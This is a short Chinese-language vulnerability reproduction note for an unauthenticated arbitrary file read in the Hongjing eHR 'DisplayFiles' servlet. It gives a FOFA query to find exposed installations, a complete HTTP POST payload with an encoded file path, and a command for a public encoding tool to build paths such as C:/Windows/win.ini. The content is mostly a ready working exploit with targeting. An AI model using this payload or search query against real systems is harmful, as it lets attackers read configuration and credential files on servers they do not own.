H1-4宏景-人力资源管理-任意文件读取
漏洞描述:
宏景eHR DisplayFiles接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
网站图片:
网络测绘:
fofa语法:
FOFA:app=“HJSOFT-HCM”
漏洞复现:
payload:
POST /templates/attestation/./servlet/DisplayFiles HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
filepath=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT
PS:读取文件内容需使用工具编码
工具地址:https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e C:/Windows/win.ini
效果图: